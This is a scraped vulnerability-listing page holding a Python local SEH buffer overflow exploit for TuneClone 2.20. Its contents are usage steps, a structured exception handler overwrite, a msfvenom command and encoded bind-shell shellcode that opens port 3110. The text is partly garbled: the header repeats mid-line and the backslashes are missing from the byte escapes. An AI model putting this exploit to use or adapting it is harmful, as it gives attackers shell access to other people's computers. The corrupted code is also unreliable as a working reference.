Tuneclone 2.20 SEH Buffer Overflow

Details
Category: Vulnerabilities
Hits: 310
# Exploit Title: TuneClone Local Seh Exploit
# Date: 19.06.2019
# Vendor Homepage: http://www.tuneclone.com/
# Software Link: http://www.tuneclone.com/tuneclone_setup.exe
# Explo # Exploit Title: TuneClone Local Seh Exploit
# Date: 19.06.2019
# Vendor Homepage: http://www.tuneclone.com/
# Software Link: http://www.tuneclone.com/tuneclone_setup.exe
# Exploit Author: Achilles
# Tested Version: 2.20
# Tested on: Windows XP SP3 EN

# 1.- Run python code : TuneClone.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open TuneClone and press Help and 'Enter License Code'
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK' and you will have a bind shell port 3110.
# 6.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "x41" * 1056
nseh = "xebx06x90x90" #jmp short 6
seh = struct.pack('<L',0x583411c0) #msaud32.acm
nops = "x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "x00x0ax0d" -i 1 -f python
#badchars "x00x0ax0d"
shellcode = ("xb8xf4xc0x2axd0xdbxd8xd9x74x24xf4x5ax2b"
"xc9xb1x53x31x42x12x83xeaxfcx03xb6xcexc8"
"x25xcax27x8exc6x32xb8xefx4fxd7x89x2fx2b"
"x9cxbax9fx3fxf0x36x6bx6dxe0xcdx19xbax07"
"x65x97x9cx26x76x84xddx29xf4xd7x31x89xc5"
"x17x44xc8x02x45xa5x98xdbx01x18x0cx6fx5f"
"xa1xa7x23x71xa1x54xf3x70x80xcbx8fx2ax02"
"xeax5cx47x0bxf4x81x62xc5x8fx72x18xd4x59"
"x4bxe1x7bxa4x63x10x85xe1x44xcbxf0x1bxb7"
"x76x03xd8xc5xacx86xfax6ex26x30x26x8exeb"
"xa7xadx9cx40xa3xe9x80x57x60x82xbdxdcx87"
"x44x34xa6xa3x40x1cx7cxcdxd1xf8xd3xf2x01"
"xa3x8cx56x4ax4exd8xeax11x07x2dxc7xa9xd7"
"x39x50xdaxe5xe6xcax74x46x6exd5x83xa9x45"
"xa1x1bx54x66xd2x32x93x32x82x2cx32x3bx49"
"xacxbbxeexe4xa4x1ax41x1bx49xdcx31x9bxe1"
"xb5x5bx14xdexa6x63xfex77x4ex9ex01x7bxa9"
"x17xe7xe9xa5x71xbfx85x07xa6x08x32x77x8c"
"x20xd4x30xc6xf7xdbxc0xccx5fx4bx4bx03x64"
"x6ax4cx0exccxfbxdbxc4x9dx4ex7dxd8xb7x38"
"x1ex4bx5cxb8x69x70xcbxefx3ex46x02x65xd3"
"xf1xbcx9bx2ex67x86x1fxf5x54x09x9ex78xe0"
"x2dxb0x44xe9x69xe4x18xbcx27x52xdfx16x86"
"x0cx89xc5x40xd8x4cx26x53x9ex50x63x25x7e"
"xe0xdax70x81xcdx8ax74xfax33x2bx7axd1xf7"
"x5bx31x7bx51xf4x9cxeexe3x99x1exc5x20xa4"
"x9cxefxd8x53xbcx9axddx18x7ax77xacx31xef"
"x77x03x31x3a")
pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"